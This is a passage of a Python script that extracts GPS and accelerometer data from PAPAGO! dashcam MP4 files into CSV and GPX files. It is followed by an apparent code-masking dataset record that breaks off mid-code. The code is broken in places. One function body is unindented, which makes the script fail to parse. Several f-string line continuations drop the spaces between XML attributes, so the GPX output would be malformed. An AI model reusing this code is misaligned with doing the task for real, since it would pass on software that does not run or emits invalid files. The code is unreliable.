`W' as a longitude type, but got an invalid character `{longitude_type}'.")
                else:
                    assert(status == 'V')
                    if longitude_type != '0':
                        error_position = format(mp4_file.tell() - 1, '#010x')
                        raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `0' as a longitude type, but got an invalid character\
`{longitude_type}'.")
                padding = mp4_file.read(1)
                if len(padding) < 1:
                    error_position = format(mp4_file.tell() - len(padding),
                                            '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:'
                                       ' Expect zero padding, but got EOF.')
                if padding[0] != 0:
                    error_position = format(mp4_file.tell() - 1, '#010x')
                    byte = format(padding[0], '#04x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
            # Latitude: stored as a float in NMEA DMM form, i.e.
            # degrees * 100 + minutes; without a fix, 4 zero bytes.
            if status == 'A':
                latitude_dmm = read_little_endian_single(mp4_file)
                latitude_degree = math.floor(latitude_dmm / 100)
                if latitude_degree < 0 or 90 < latitude_degree:
                    error_position = format(mp4_file.tell() - 4, '#010x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.")
                latitude_minute = latitude_dmm - latitude_degree * 100
                if latitude_minute < 0 or 60 <= latitude_minute:
                    error_position = format(mp4_file.tell() - 4, '#010x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.")
                latitude_degree += latitude_minute / 60
                latitude = Latitude(latitude_degree)
            else:
                assert(status == 'V' or status is None)
                padding = mp4_file.read(4)
                if len(padding) < 4:
                    error_position = format(
                        mp4_file.tell() - len(padding), '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:'
                                       ' Expect zero padding, but got EOF.')
                for j, b in enumerate(padding):
                    if b != 0:
                        error_position = format(
                            mp4_file.tell() - 4 + j, '#010x')
                        byte = format(b, '#04x')
                        raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
                latitude = None
            # Longitude: same DMM encoding as the latitude.
            if status == 'A':
                longitude_dmm = read_little_endian_single(mp4_file)
                longitude_degree = math.floor(longitude_dmm / 100)
                if longitude_degree < 0 or 180 < longitude_degree:
                    error_position = format(mp4_file.tell() - 4, '#010x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a longitude in DMM format, but got an invalid value\
`{longitude_dmm}'.")
                longitude_minute = longitude_dmm - longitude_degree * 100
                if longitude_minute < 0 or 60 <= longitude_minute:
                    error_position = format(mp4_file.tell() - 4, '#010x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a longitude in DMM format, but got an invalid value\
`{longitude_dmm}'.")
                longitude_degree += longitude_minute / 60
                longitude = Longitude(longitude_degree)
            else:
                assert(status == 'V' or status is None)
                padding = mp4_file.read(4)
                if len(padding) < 4:
                    error_position = format(
                        mp4_file.tell() - len(padding), '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:'
                                       ' Expect zero padding, but got EOF.')
                for j, b in enumerate(padding):
                    if b != 0:
                        error_position = format(
                            mp4_file.tell() - 4 + j, '#010x')
                        byte = format(b, '#04x')
                        raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
                longitude = None
            speed = read_little_endian_single(mp4_file)
            # Presume that speed is recorded in knots; convert to meters
            # per second (1 knot = 1852 m / 3600 s).
            speed *= (1852 / 3600)
            speed = Speed(speed)
            azimuth = read_little_endian_single(mp4_file)
            if azimuth < 0 or 360 <= azimuth:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
azimuth degree, but got an invalid value `{azimuth}'.")
            azimuth = Azimuth(azimuth)
            # Three signed 32-bit accelerometer readings; the unit of the
            # raw counts is not determinable from this file.
            x_acceleration = mp4_file.read(4)
            if len(x_acceleration) < 4:
                error_position = format(
                    mp4_file.tell() - len(x_acceleration), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' X-axis acceleration, but got EOF.')
            x_acceleration = int.from_bytes(
                x_acceleration, 'little', signed=True)
            y_acceleration = mp4_file.read(4)
            if len(y_acceleration) < 4:
                error_position = format(
                    mp4_file.tell() - len(y_acceleration), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' Y-axis acceleration, but got EOF.')
            y_acceleration = int.from_bytes(
                y_acceleration, 'little', signed=True)
            z_acceleration = mp4_file.read(4)
            if len(z_acceleration) < 4:
                error_position = format(
                    mp4_file.tell() - len(z_acceleration), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' Z-axis acceleration, but got EOF.')
            z_acceleration = int.from_bytes(
                z_acceleration, 'little', signed=True)
            if mp4_file.tell() != small_block_end:
                error_position = format(mp4_file.tell(), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the end of a GPS data block, but got additional data.')
            # The rest of the outer block (at least 532 bytes) is padding:
            # zeros except possibly `_UNKNOWN_BYTES` at offsets 420..532.
            padding_size = large_block_end - small_block_end
            if padding_size < 532:
                error_position = format(mp4_file.tell(), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
more than or equal to 532-byte padding, but got only {padding_size}-byte\
padding.')
            padding = mp4_file.read(padding_size)
            if len(padding) < padding_size:
                error_position = format(
                    mp4_file.tell() - len(padding), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
{padding_size}-byte padding, but got EOF.')
            for j, b in enumerate(padding[:420]):
                if b != 0:
                    error_position = format(small_block_end + j, '#010x')
                    byte = format(b, '#04x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
            # `_UNKNOWN_BYTES` may appear in the zero padding.  However,
            # what this means is unknown.  Therefore, just skip it if it
            # appears.
            if padding[420:532] != _UNKNOWN_BYTES:
                for j, b in enumerate(padding[420:532]):
                    if b != 0:
                        error_position = format(small_block_end + 420 + j,
                                                '#010x')
                        byte = format(b, '#04x')
                        raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
            for j, b in enumerate(padding[532:]):
                if b != 0:
                    error_position = format(small_block_end + 532 + j, '#010x')
                    byte = format(b, '#04x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
            track_point = TrackPoint(
                time, status, latitude, longitude, speed, azimuth,
                x_acceleration, y_acceleration, z_acceleration)
            track_points.append(track_point)
    return track_points
def read_input_paths(input_paths: List[pathlib.Path]) -> List[TrackPoint]:
    """Collect track points from each input.

    A plain file is parsed directly; a directory is walked recursively and
    every `.mp4`/`.MP4` file found is parsed in sorted-path order.
    """
    track_points = []
    for input_path in input_paths:
        if not input_path.is_dir():
            track_points.extend(parse_mp4_file(input_path))
            continue
        file_paths = []
        for dirpath, dirnames, filenames in os.walk(input_path):
            directory = pathlib.Path(dirpath)
            for filename in filenames:
                file_path = directory / filename
                # Only these two exact suffixes are accepted.
                if file_path.suffix in ('.mp4', '.MP4'):
                    file_paths.append(file_path)
        for file_path in sorted(file_paths):
            track_points.extend(parse_mp4_file(file_path))
    return track_points
def write_csv_file(args: Arguments,
                   track_points: List[TrackPoint]) -> pathlib.Path:
    """Write `track_points` to `<args.name>.csv` and return the path.

    Exits with status 1 when `--name` is missing or when the file already
    exists and `--overwrite` is not given.
    """
    if args.name is None:
        print("`--name' is required to output a CSV file.", file=sys.stderr)
        sys.exit(1)
    csv_file_path = pathlib.Path(f'{args.name}.csv')
    if csv_file_path.exists() and not args.overwrite:
        print(f"{csv_file_path}: File already exists.", file=sys.stderr)
        sys.exit(1)
    with open(csv_file_path, 'w') as csv_file:
        csv_file.writelines(
            track_point.format_as_csv() + '\n' for track_point in track_points)
    return csv_file_path
def create_track_segments(
        args: Arguments, track_points: List[TrackPoint]) -> List[TrackSegment]:
    """Build the list of track segments from `track_points`.

    Points without a GPS fix are dropped, the rest are sorted by time, and
    points sharing a timestamp are collapsed according to
    `args.how_to_unique` (`'first'`/`'last'`; any other value raises when a
    genuine conflict exists).  All surviving points go into one segment.
    """
    fixed_points = []
    for track_point in track_points:
        if track_point.status != 'A':
            assert(track_point.latitude is None)
            assert(track_point.longitude is None)
            continue
        assert(track_point.latitude is not None)
        assert(track_point.longitude is not None)
        fixed_points.append(track_point)
    fixed_points.sort()
    if not fixed_points:
        return []
    # Collapse runs of points sharing one timestamp down to a single
    # representative point.
    unique_track_points = []
    representative = fixed_points[0]
    for candidate in fixed_points[1:]:
        if candidate.time != representative.time:
            unique_track_points.append(representative)
            representative = candidate
        elif candidate.latitude == representative.latitude\
                and candidate.longitude == representative.longitude:
            pass  # An exact duplicate: nothing to decide.
        elif args.how_to_unique == 'first':
            pass  # Keep the earlier point.
        elif args.how_to_unique == 'last':
            representative = candidate
        else:
            raise RuntimeError("There exist track points with the same\
timestamp but different coordinates. Use `--uniq' option.")
    unique_track_points.append(representative)
    segment = TrackSegment()
    for track_point in unique_track_points:
        segment.append_track_point(track_point)
    return [segment]
def as_xml_attribute(data: str) -> str:
return xml.sax.saxutils.quoteattr(data)
def as_xml_data(data: str) -> str:
    """Escape `data` (`&`, `<`, `>`) for use as XML character data."""
    escaped = xml.sax.saxutils.escape(data)
    return escaped
def get_local_time_in_iso8601() -> str:
    """Return the current local time as ISO 8601, e.g.
    `2020-01-02T03:04:05+09:00`."""
    now = datetime.datetime.now(datetime.timezone.utc).astimezone()
    stamp = now.strftime('%Y-%m-%dT%H:%M:%S%z')
    # `%z` emits `+0900`; insert the colon that ISO 8601 requires.
    return re.sub('([+-]\\d{2})(\\d{2})$', '\\1:\\2', stamp)
def write_gpx_file(args: Arguments,
                   track_segments: List[TrackSegment]) -> pathlib.Path:
    """Write `track_segments` as a GPX 1.1 file and return its path.

    The output name is `<args.name>.gpx`, falling back to the earliest
    track point's compact timestamp when `--name` is absent.  After
    writing, the file is validated with `xmllint` against `gpx.xsd` (a
    validation failure is reported but does not abort).
    """
    all_track_points = []
    for track_segment in track_segments:
        for track_point in track_segment:
            all_track_points.append(track_point)
    name = args.name
    if name is None:
        # Derive the file name from the earliest point's `name` property.
        if len(all_track_points) == 0:
            raise ValueError(
                "`--name' is not specified, and there is no track point.")
        all_track_points.sort()
        name = all_track_points[0].name
    gpx_file_path = pathlib.Path(f'{name}.gpx')
    # Bounding box (min lat, min lon, max lat, max lon) over all points;
    # `Latitude`/`Longitude` define `__lt__`, so sorting works directly.
    bounds = None
    if len(all_track_points) > 0:
        latitudes = list(t.latitude for t in all_track_points)
        latitudes.sort()
        longitudes = list(t.longitude for t in all_track_points)
        longitudes.sort()
        bounds = (latitudes[0], longitudes[0], latitudes[-1], longitudes[-1])
    if gpx_file_path.exists():
        if not args.overwrite:
            print(f'{gpx_file_path}: Error: File already exists.',
                  file=sys.stderr)
            sys.exit(1)
    with open(gpx_file_path, 'w') as gpx_file:
        print('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>',
              file=gpx_file)
        print('<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1"'
              ' creator="papago2gpx">', file=gpx_file)
        print('  <metadata>', file=gpx_file)
        print(f'    <name>{as_xml_data(name)}</name>', file=gpx_file)
        if args.description is not None:
            description = as_xml_data(args.description)
            print(f'    <desc>{description}</desc>', file=gpx_file)
        if args.author_name is not None or args.author_email is not None:
            print('    <author>', file=gpx_file)
            if args.author_name is not None:
                author_name = as_xml_data(args.author_name)
                print(f'      <name>{author_name}</name>', file=gpx_file)
            if args.author_email is not None:
                author_email_parts = args.author_email.split('@', 1)
                if len(author_email_parts) != 2:
                    raise RuntimeError(
                        f'An invalid E-mail address: {args.author_email}')
                author_email_id = as_xml_attribute(author_email_parts[0])
                author_email_domain = as_xml_attribute(author_email_parts[1])
                # NOTE(review): the backslash continuation below yields no
                # space before `domain=` in the emitted tag -- looks like
                # a formatting bug; confirm with the xmllint validation.
                print(f'      <email id={author_email_id}\
domain={author_email_domain}/>', file=gpx_file)
            print('    </author>', file=gpx_file)
        if args.copyright is not None:
            copyright = as_xml_attribute(args.copyright)
            print(f'    <copyright author={copyright}', end='', file=gpx_file)
            copyright_year = args.copyright_year
            copyright_license = args.copyright_license
            # Emit a self-closing tag unless a year or license needs to
            # nest inside the element.
            if copyright_year is not None or copyright_license is not None:
                print('>', file=gpx_file)
                if copyright_year is not None:
                    copyright_year = as_xml_data(str(copyright_year))
                    print(f'      <year>{copyright_year}</year>',
                          file=gpx_file)
                if copyright_license is not None:
                    copyright_license = as_xml_data(copyright_license)
                    print(f'      <license>{copyright_license}</license>',
                          file=gpx_file)
                print('    </copyright>', file=gpx_file)
            else:
                print('/>', file=gpx_file)
        print(f'    <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)
        if args.keywords is not None:
            keywords = as_xml_data(args.keywords)
            print(f'    <keywords>{keywords}</keywords>', file=gpx_file)
        if bounds is not None:
            # NOTE(review): as above, the continuation leaves no space
            # before `maxlat=` -- confirm.
            print(f'    <bounds minlat="{bounds[0]}" minlon="{bounds[1]}"\
maxlat="{bounds[2]}" maxlon="{bounds[3]}"/>', file=gpx_file)
        print('  </metadata>', file=gpx_file)
        print('  <trk>', file=gpx_file)
        if args.track_name is not None:
            track_name = as_xml_data(args.track_name)
            print(f'    <name>{track_name}</name>', file=gpx_file)
        if args.track_comment is not None:
            track_comment = as_xml_data(args.track_comment)
            print(f'    <cmt>{track_comment}</cmt>', file=gpx_file)
        if args.track_description is not None:
            track_description = as_xml_data(args.track_description)
            print(f'    <desc>{track_description}</desc>', file=gpx_file)
        if args.track_type is not None:
            track_type = as_xml_data(args.track_type)
            print(f'    <type>{track_type}</type>', file=gpx_file)
        for track_segment in track_segments:
            print('    <trkseg>', file=gpx_file)
            for track_point in track_segment:
                # NOTE(review): no space before `lon=` either -- confirm.
                print(f'      <trkpt lat="{track_point.latitude}"\
lon="{track_point.longitude}">', file=gpx_file)
                print(f'        <time>{track_point.time}</time>',
                      file=gpx_file)
                print('      </trkpt>', file=gpx_file)
            print('    </trkseg>', file=gpx_file)
        print('  </trk>', file=gpx_file)
        print('</gpx>', file=gpx_file)
    # Best-effort schema validation; requires `xmllint` on PATH and
    # `gpx.xsd` in the working directory.
    proc = subprocess.run(
        ['xmllint', '--schema', 'gpx.xsd', str(gpx_file_path)],
        stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,
        stderr=subprocess.PIPE, encoding='UTF-8')
    if proc.returncode != 0:
        print(f"""Failed to validate the GPX file `{gpx_file_path}'.
  command: {proc.args}
  stdout: {proc.stdout}
  stderr: {proc.stderr}
  returncode: {proc.returncode}""", file=sys.stderr)
    return gpx_file_path
# Script entry point: parse every input into track points, then emit both
# a CSV file and a GPX file from them.
if __name__ == '__main__':
    args = Arguments()
    track_points = read_input_paths(args.input_paths)
    csv_file_path = write_csv_file(args, track_points)
    print(f"Succeeded! The result is output to `{csv_file_path}'.")
    track_segments = create_track_segments(args, track_points)
    # `write_gpx_file` derives the output name from the first track point
    # when `--name` is absent, so at least one segment is required then.
    if args.name is None and len(track_segments) == 0:
        print("`--name' is not specified, and there is no track segment.",
              file=sys.stderr)
        sys.exit(1)
    if len(track_segments) == 0:
        print('WARNING: There is no track segment.', file=sys.stderr)
    gpx_file_path = write_gpx_file(args, track_segments)
    print(f"Succeeded! The result is output to `{gpx_file_path}'.")
    sys.exit(0)
|
normal
|
{
"blob_id": "fbb1254c7166fa2aa9cd8a0b9c6525dbe5b652a0",
"index": 2625,
"step-1": "<mask token>\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n 
def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n 
local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Arguments(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n <mask token>\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n <mask token>\n <mask token>\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n 
def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) 
->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def 
__iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Arguments(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(prog='papago2gpx', description=\n 'Extract GPS data from MP4 video files created by PAPAGO! dashcams, and format them into a GPX file.'\n )\n parser.add_argument('input_paths', nargs='+', help=\n 'The path to an input file or directory.', metavar='INPUT_PATH')\n parser.add_argument('--name', help=\n 'The name of the GPX file to output. Default to 16 deciaml digits representing the first GPS record time.'\n , metavar='NAME')\n parser.add_argument('--description', help=\n 'The description of the GPX file to output.', metavar='DESCRIPTION'\n )\n parser.add_argument('--author-name', help=\n 'The name of the author of the GPX file to output.', metavar=\n 'AUTHOR_NAME')\n parser.add_argument('--author-email', help=\n 'The Email address of the author of the GPX file to output.',\n metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\n \"The copyright holder of the GPX file to output. Default to `AUTHOR_NAME'.\"\n , metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\n 'The copyright year of the GPX file to output. Default to the year the file is created.'\n , metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help=\n 'A link to an external file containing license text.', metavar=\n 'LICENSE')\n parser.add_argument('--keywords', help=\n 'Keywords associated with the GPX file to output.', metavar=\n 'KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument('--track-comment', help=\n 'The comment of the track.', metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\n 'The description of the track.', metavar='TRACK_DESCRIPTION')\n parser.add_argument('--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. 
Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'], help=\n 'How to process different coordinates recorded at the same timestamp. Default to an error.'\n )\n parser.add_argument('--overwrite', action='store_true', help=\n 'Allow to overwrite an existing file.')\n args = parser.parse_args()\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f'{input_path}: File does not exist.', file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n self._name = args.name\n self._description = args.description\n self._author_name = args.author_name\n self._author_email = args.author_email\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n self._copyright_year = local_aware_now.year\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\n \"`--copyright-license' is specified, but `--copyright' is not.\"\n , file=sys.stderr)\n sys.exit(1)\n self._keywords = args.keywords\n self._track_name = args.track_name\n self._track_comment = args.track_comment\n self._track_description = args.track_description\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n self._how_to_unique = args.uniq\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) ->List[pathlib.Path]:\n return 
